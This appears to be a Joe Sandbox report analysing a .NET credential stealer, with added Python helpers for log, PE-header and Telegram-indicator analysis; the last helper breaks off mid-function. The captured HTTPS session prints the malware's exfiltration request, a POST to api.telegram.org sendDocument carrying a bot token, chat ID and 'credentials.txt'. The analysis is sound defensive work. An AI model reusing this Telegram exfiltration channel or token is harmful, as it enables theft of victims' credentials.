    URLs from memory and binary strings
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269 | MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://api.telegram.org/Qv | MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://api.telegram.org/bot | SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp; MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp | false | | high
    http://james.newtonking.com/projects/json | SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.359072458.000000000340B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://api.telegram.org/ | MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp | false | | high

    The "high" reputation and "Malicious: false" verdicts on the api.telegram.org entries reflect the popularity of the Telegram domain, not the intent of the bot endpoint: the URL carrying the bot token and chat_id is the sample's exfiltration channel (see the HTTPS session below). The james.newtonking.com URL is the Json.NET project URL and typically surfaces when a sample bundles the Newtonsoft.Json library.
    Public IPs
    IP | Domain | Country | ASN | ASN Name | Malicious
    149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:679095
                 Start date and time: 2022-08-05 09:06:10 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 29s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SecuriteInfo.com.W32.AIDetectNet.01.19566.31995 (renamed file extension from 31995 to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                 Number of new started processes analysed: 26
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/2@1/1
                EGA Information:
                • Successful, ratio: 66.7%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 82%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 20.82.210.154, 23.211.6.115, 20.190.159.3, 20.190.159.19, 20.190.159.1, 40.126.31.70, 20.190.159.5, 40.126.31.64, 20.190.159.22, 40.126.31.68, 23.211.4.86, 20.82.209.183, 95.140.236.128, 80.67.82.235, 80.67.82.211, 20.54.89.106, 40.125.122.176, 52.242.101.226, 20.223.24.244
                • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.co
                • Execution Graph export aborted for target MSBuild.exe, PID 6000 because it is empty
                 • Not all processes were analyzed; the report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                 Time | Type | Description
                 09:08:05 | API Interceptor | 598x Sleep call for process: MSBuild.exe modified
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):323
                Entropy (8bit):5.341038075456123
                Encrypted:false
                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21t92W+P12MUAvvrs:Q3La/KDLI4MWuPk21t92n4M6
                MD5:9FEAEEB3F595D644B8A003CA116508D1
                SHA1:E2A4B06B16147F0C77AE2839DF37E9FFEB645DBE
                SHA-256:37C92A24F9BD9FBF354209FE9DDA880B5B9C117F2CC863764EFD7F303548696D
                SHA-512:DAE054E5DB8E869347F415FA57150B352381D1EBB90CF3D67BBFF69B4B27E0F2047E24B4E2BE36EE79EE2E94E766533772E9FF61969805C3709BD94906DBF2BA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1223
                Entropy (8bit):5.346062503059366
                Encrypted:false
                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4Kx1qE4qpAE4Kzr7UE4KdE4KBLWE4Ks:MxHKXwYHKhQnoIHKx1qHmAHKzvUHKdHH
                MD5:3DDB3395410AB0225D8446C3FE175E6B
                SHA1:50B188BB284BA077F95F474772B21AC99BDBDA92
                SHA-256:1A6B66ED2247FED43E928FA030AE380471D074E2C38B0AFD938AA1CD06C5D62F
                SHA-512:5F5BDCFFCA48350ADA596BC040B2984D2076E97FE15341D5BF69D57C24E7FD124ACCA7369C6093089D9062DE2AB2207E70A97511C53FD6575555A1AC7871C148
                Malicious:true
                Reputation:low
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\W
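                 Both dropped-file previews use the record format of the CLR's per-process assembly usage logs (one line per binding: a numeric record kind, the assembly's full strong name, optionally the native-image path, and a trailing flag). The report does not print the file paths, but logs of this shape are a useful forensic trace of which managed code actually ran inside a host such as AppLaunch.exe or MSBuild.exe. The Python below is an added example, not part of the Joe Sandbox report: it re-types the first preview with its ".." separators rendered as CRLF (the second preview is truncated on the page and is not reproduced), lists the assemblies bound, and flags any assembly loaded from outside the GAC and framework directories, using one constructed record to exercise that check. The record kinds are passed through as-is; that kind 3 carries a path and kind 2 does not is taken from the preview itself.

```python
"""Parse CLR assembly-usage log records (the format of the dropped-file previews above).

Added example, not Joe Sandbox code.
"""
import csv

# Re-typed from the first preview in the report, with its ".." separators as CRLF.
APPLAUNCH_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\\System.ni.dll",0\r\n'
    '2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
)
# Constructed record (not from the report) to exercise the path check below.
SUSPICIOUS_LOG = APPLAUNCH_LOG + (
    '3,"Payload, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null",'
    '"C:\\Users\\user\\AppData\\Local\\Temp\\payload.dll",0\r\n'
)
# Directories from which framework assemblies are expected to bind.
EXPECTED_PREFIXES = ("c:\\windows\\assembly\\", "c:\\windows\\microsoft.net\\")


def parse_usage_log(text):
    """Yield one dict per record: numeric kind, the quoted text fields, and the trailing flag.

    Strong names contain commas, so a real CSV parser is needed rather than split(",").
    """
    for row in csv.reader(text.splitlines()):
        if len(row) < 3:
            continue
        yield {"kind": int(row[0]), "fields": row[1:-1], "flag": int(row[-1])}


def assemblies(text):
    """Short names of the assemblies the process bound (kinds 2 and 3 carry a strong name)."""
    return [r["fields"][0].split(",")[0] for r in parse_usage_log(text) if r["kind"] in (2, 3)]


def unexpected_paths(text):
    """Paths of bound assemblies outside the GAC and framework directories."""
    hits = []
    for r in parse_usage_log(text):
        if r["kind"] == 3 and len(r["fields"]) >= 2:
            path = r["fields"][1]
            if not path.lower().startswith(EXPECTED_PREFIXES):
                hits.append(path)
    return hits


if __name__ == "__main__":
    print(assemblies(APPLAUNCH_LOG))
    print(unexpected_paths(SUSPICIOUS_LOG))
```

                 For the AppLaunch.exe log this yields System and Microsoft.VisualBasic, which is what one expects of a VB.NET payload running inside a framework host that itself needs neither; the second preview adds System.Windows.Forms, System.Drawing, System.Xml, System.Numerics and System.Runtime.Serialization for the sample process.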
                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.289280780238567
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
                File size:2457088
                MD5:7278f8490937cab29d3dd5bc75cb52ab
                SHA1:69a0419c995fc139ea27e731a44205cb1b686f1d
                SHA256:0fabbda008ee7544a4f2d1bdaf5621f19bc41e82740f293dfe1644fc0af9230b
                SHA512:71f6b363327b6ef6d5204cbfd31e2cb71d456ef54c24d53cd504bed6eec5b14079605f60cf47bc7ec9fbffe8b89ca37766b418ab236801193838417b4587deb7
                SSDEEP:24576:l5niq2/Fw0WbSwK5QUhHcAxP0IXucQfPTO8k4TgjbTG7lVgFyHJSf2uwkYABYPzT:iMSH5DrPHX3wDgFmLIYPzR3nc89UZcn
                TLSH:09B5582DCA8DEF35F6A9A97EF6F945278C6FE9091C42ED0E3390511B0E7D886160C193
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.b..............0..~$.........>.$.. ........@.. ........................%...........@................................
                Icon Hash:64e4cc8df0f0f0b0
                Entrypoint:0x649c3e
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x62EC709A [Fri Aug 5 01:21:30 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                 Instruction (disassembly at the entry point)
                 jmp dword ptr [00402000h]
                 (the bytes that follow are zero padding; each 00 00 pair disassembles as "add byte ptr [eax], al", listed 97 times in the original)
                 Data directories
                 Name | Virtual Address | Virtual Size | Is in Section
                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0x249bec | 0x4f | .text
                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0xfc00 | .rsrc
                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25a000 | 0xc | .reloc
                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                 Sections
                 Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                 .text | 0x2000 | 0x247c44 | 0x247e00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                 .rsrc | 0x24a000 | 0xfc00 | 0xfc00 | False | 0.8014942956349206 | data | 7.473628318342458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                 .reloc | 0x25a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                 Resources
                 Name | RVA | Size | Type | Language | Country
                 RT_ICON | 0x24a160 | 0x528 | GLS_BINARY_LSB_FIRST | |
                 RT_ICON | 0x24a698 | 0x1428 | dBase IV DBT of @.DBF, block length 5120, next free block index 40, next free block 0, next used block 0 | |
                 RT_ICON | 0x24bad0 | 0x2d28 | data | |
                 RT_ICON | 0x24e808 | 0xa9cb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                 RT_GROUP_ICON | 0x2591e4 | 0x3e | data | |
                 RT_VERSION | 0x259234 | 0x5dc | data | |
                 RT_MANIFEST | 0x259820 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
                 Imports
                 DLL | Import
                 mscoree.dll | _CorExeMain
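                 The entry-point disassembly, directory table and import table above together describe a standard 32-bit .NET executable: the six bytes at the entry point are FF 25 followed by a 32-bit address, a jmp through the single IAT slot (RVA 0x2000, size 8, so 0x402000 once the image is at its preferred base 0x400000) that the loader fills with mscoree!_CorExeMain; everything after that stub is zero padding. Note also that the report's "Entrypoint: 0x649c3e" is a virtual address: the RVA is 0x249c3e, which falls in .text just behind the import directory. The Python below is an added example, not part of the Joe Sandbox report. It builds PE32 headers from the values listed above (PointerToRawData for each section is not in the report and is assumed, chosen 0x200-aligned and consistent with the 2457088-byte file size), parses them back, decodes the link timestamp and DLL characteristics, and checks that the entry stub's indirect target lies inside the IAT.

```python
"""Cross-check the PE32 header values in a sandbox report and decode the .NET entry stub.

Added example, not Joe Sandbox code. The header bytes are constructed from the values
the report lists; PointerToRawData per section is assumed.
"""
import struct
from datetime import datetime, timezone

IMAGE_BASE = 0x400000
ENTRY_RVA = 0x249c3e            # report's "Entrypoint: 0x649c3e" minus ImageBase
TIMESTAMP = 0x62EC709A
# name, VirtualAddress, VirtualSize, SizeOfRawData, PointerToRawData (assumed), Characteristics
SECTIONS = [
    (b".text",  0x2000,   0x247c44, 0x247e00, 0x200,    0x60000020),
    (b".rsrc",  0x24a000, 0xfc00,   0xfc00,   0x248000, 0x40000040),
    (b".reloc", 0x25a000, 0xc,      0x200,    0x257c00, 0x42000040),
]
# Data directories by index: 1 IMPORT, 2 RESOURCE, 5 BASERELOC, 12 IAT, 14 COM_DESCRIPTOR (CLR header)
DIRS = {1: (0x249bec, 0x4f), 2: (0x24a000, 0xfc00), 5: (0x25a000, 0xc),
        12: (0x2000, 0x8), 14: (0x2008, 0x48)}
DLL_FLAGS = {0x40: "DYNAMIC_BASE", 0x100: "NX_COMPAT", 0x400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}


def build_headers():
    """Constructed DOS/COFF/optional/section headers mirroring the report (no section bodies)."""
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14c, len(SECTIONS), TIMESTAMP, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIII", 0x10b, 48, 0, 0x247e00, 0x10000, 0, ENTRY_RVA, 0x2000, 0x24a000)
    opt += struct.pack("<III", IMAGE_BASE, 0x2000, 0x200)   # ImageBase, SectionAlignment, FileAlignment
    opt += struct.pack("<HHHHHHIIII", 4, 0, 4, 0, 4, 0, 0, 0x25c000, 0x200, 0)
    opt += struct.pack("<HHIIIIII", 2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *DIRS.get(i, (0, 0))) for i in range(16))
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, va, vs, rs, rp, ch in SECTIONS)
    return dos + coff + opt + secs


def parse_pe(data):
    """Return the header fields an analyst cross-checks against a sandbox report."""
    e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10b:
        raise ValueError("only PE32 handled here (PE32+ keeps ImageBase at another offset)")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vs, va, rs, rp, *_rest = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vs, rs, rp))
    return {"machine": machine, "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc),
            "characteristics": chars, "entry": entry, "image_base": image_base,
            "subsystem": subsystem, "dll_characteristics": dll_chars,
            "is_dotnet": ndirs > 14 and dirs[14][1] != 0, "dirs": dirs, "sections": sections}


def section_for_rva(sections, rva):
    """Name of the section whose virtual range covers the RVA, or None."""
    for name, va, vs, rs, _ in sections:
        if va <= rva < va + max(vs, rs):
            return name
    return None


def dll_flags(value):
    return [name for bit, name in DLL_FLAGS.items() if value & bit]


def decode_clr_stub(code, image_base, iat):
    """Decode 'FF 25 disp32' (jmp dword ptr [disp32]) and confirm disp32 lies in the IAT.

    Every .NET 4 PE32 starts with this six-byte stub; the bytes after it are zero
    padding, which is why a disassembler prints 'add byte ptr [eax], al' (opcode 00 00).
    """
    if code[:2] != b"\xff\x25":
        return None
    target = struct.unpack_from("<I", code, 2)[0]
    iat_rva, iat_size = iat
    if image_base + iat_rva <= target < image_base + iat_rva + iat_size:
        return target
    return None


# Constructed bytes as they sit at the entry point: the stub plus zero padding.
ENTRY_BYTES = b"\xff\x25" + struct.pack("<I", IMAGE_BASE + 0x2000) + b"\x00" * 10

if __name__ == "__main__":
    pe = parse_pe(build_headers())
    print(pe["timestamp"].isoformat(), hex(pe["image_base"] + pe["entry"]),
          section_for_rva(pe["sections"], pe["entry"]), dll_flags(pe["dll_characteristics"]))
    print(hex(decode_clr_stub(ENTRY_BYTES, pe["image_base"], pe["dirs"][12])))
```

                 The decoded link timestamp is 2022-08-05 01:21:30 UTC, about six hours before the analysis started (09:06 +02:00), so the binary was built the same night it was submitted; .NET compilers write a real timestamp here unless the build is deterministic, in which case the field is a hash and this comparison is meaningless.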
                 TCP packets (the report keeps only the first 100 packets; summarised here per flow, timestamps in CEST)
                 Source | Destination | Packets out / in | First packet | Last packet
                 192.168.2.3:49695 | 131.253.33.200:443 | 12 / 49 | Aug 5, 2022 09:07:16.787971020 | Aug 5, 2022 09:07:16.872857094
                 192.168.2.3:49735 | 40.126.31.4:443 | 4 / 2 | Aug 5, 2022 09:07:24.632554054 | Aug 5, 2022 09:07:54.510822058
                 192.168.2.3:49673 | 93.184.220.29:80 | 7 / 0 (no reply captured) | Aug 5, 2022 09:07:27.157124996 | Aug 5, 2022 09:07:46.609872103
                 192.168.2.3:49672 | 173.222.108.210:80 | 7 / 0 (no reply captured) | Aug 5, 2022 09:07:27.157316923 | Aug 5, 2022 09:07:46.469278097
                 192.168.2.3:49744 | 204.79.197.200:443 | 6 / 4 | Aug 5, 2022 09:07:58.481832027 | Aug 5, 2022 09:07:59.763642073
                 192.168.2.3:49745 | 204.79.197.200:443 | 5 / 4 | Aug 5, 2022 09:07:58.481836081 | Aug 5, 2022 09:07:59.127394915
                 The connection to api.telegram.org (source port 49751, listed under the HTTPS session below) occurs after the 100 retained packets and is therefore absent from this table.
                 UDP packets
                 Timestamp | Source | Destination
                 Aug 5, 2022 09:08:35.228647947 CEST | 192.168.2.3:58116 | 8.8.8.8:53
                 Aug 5, 2022 09:08:35.247535944 CEST | 8.8.8.8:53 | 192.168.2.3:58116

                 DNS queries
                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                 Aug 5, 2022 09:08:35.228647947 CEST | 192.168.2.3 | 8.8.8.8 | 0x46e6 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

                 DNS answers
                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName / Address | Type | Class
                 Aug 5, 2022 09:07:54.819008112 CEST | 8.8.8.8 | 192.168.2.3 | 0x5059 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | CNAME (Canonical name) | IN (0x0001)
                 Aug 5, 2022 09:07:58.240801096 CEST | 8.8.8.8 | 192.168.2.3 | 0xb3b6 | No error (0) | www-bing-com.dual-a-0001.a-msedge.net | dual-a-0001.a-msedge.net | CNAME (Canonical name) | IN (0x0001)
                 Aug 5, 2022 09:07:58.240801096 CEST | 8.8.8.8 | 192.168.2.3 | 0xb3b6 | No error (0) | dual-a-0001.a-msedge.net | 204.79.197.200 | A (IP address) | IN (0x0001)
                 Aug 5, 2022 09:07:58.240801096 CEST | 8.8.8.8 | 192.168.2.3 | 0xb3b6 | No error (0) | dual-a-0001.a-msedge.net | 13.107.21.200 | A (IP address) | IN (0x0001)
                 Aug 5, 2022 09:08:04.870759964 CEST | 8.8.8.8 | 192.168.2.3 | 0x59b | No error (0) | windowsupdatebg.s.llnwi.net | 95.140.236.128 | A (IP address) | IN (0x0001)
                 Aug 5, 2022 09:08:35.247535944 CEST | 8.8.8.8 | 192.168.2.3 | 0x46e6 | No error (0) | api.telegram.org | 149.154.167.220 | A (IP address) | IN (0x0001)
                 HTTPS session: api.telegram.org
                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                 0 | 192.168.2.3 | 49751 | 149.154.167.220 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

                 Timestamp | kBytes transferred | Direction | Data
                 2022-08-05 07:08:35 UTC | 0 | OUT | POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1
                 Accept: */*
                 Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                 Accept-Language: en-us
                 Accept-Encoding: gzip, deflate
                 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                 Host: api.telegram.org
                 Content-Length: 201
                 Connection: Keep-Alive
                 Cache-Control: no-cache
                 2022-08-05 07:08:35 UTC | 0 | OUT | Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 65 64 65 6e 74 69 61 6c 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 2d 2d
                 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113 / Content-Disposition: form-data; name="document"; filename="credentials.txt" / Content-Type: application/octet-stream / (empty file body) / --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--
                 2022-08-05 07:08:36 UTC | 0 | IN | HTTP/1.1 400 Bad Request
                 Server: nginx/1.18.0
                 Date: Fri, 05 Aug 2022 07:08:35 GMT
                 Content-Type: application/json
                 Content-Length: 81
                 Connection: close
                 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                 Access-Control-Allow-Origin: *
                 Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                 2022-08-05 07:08:36 UTC | 1 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 66 69 6c 65 20 6d 75 73 74 20 62 65 20 6e 6f 6e 2d 65 6d 70 74 79 22 7d
                 Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: file must be non-empty"}
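                 The exchange above is a Telegram Bot API upload: the bot token is part of the URL path, the chat ID and caption are query parameters, and the stolen file travels as a multipart/form-data part named "document". The 400 reply ("file must be non-empty") shows that the stealer posted a zero-length credentials.txt because the analysis VM held nothing to harvest; on a real victim the same request would succeed, so the failed upload must not be read as benign. The Python below is an added example, not part of the Joe Sandbox report: it re-types the request line, the 201-byte body and the JSON reply shown above, extracts the token, bot ID, chat ID and API method, parses the multipart body to measure the uploaded part, and reads the reply to decide whether exfiltration succeeded.

```python
"""Extract Telegram Bot API exfiltration indicators from a captured HTTP exchange.

Added example, not Joe Sandbox code. The request line, body and response below are
re-typed from the report's HTTPS session.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Bot API paths look like /bot<numeric bot id>:<secret>/<method>
BOT_PATH_RE = re.compile(r"^/bot(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,50})/(?P<method>[A-Za-z]+)$")

REQUEST_LINE = ("POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument"
                "?chat_id=1269002131&caption=credentials.txt:::computer\\user HTTP/1.1")
BOUNDARY = "3fbd04f5-b1ed-4060-99b9-fca7ff59c113"
REQUEST_BODY = (
    b"--3fbd04f5-b1ed-4060-99b9-fca7ff59c113\r\n"
    b'Content-Disposition: form-data; name="document"; filename="credentials.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"\r\n--3fbd04f5-b1ed-4060-99b9-fca7ff59c113--"
)
RESPONSE_BODY = b'{"ok":false,"error_code":400,"description":"Bad Request: file must be non-empty"}'


def parse_bot_request(request_line):
    """Return token, bot id, API method and query parameters, or None for non-bot URLs."""
    http_method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        return None
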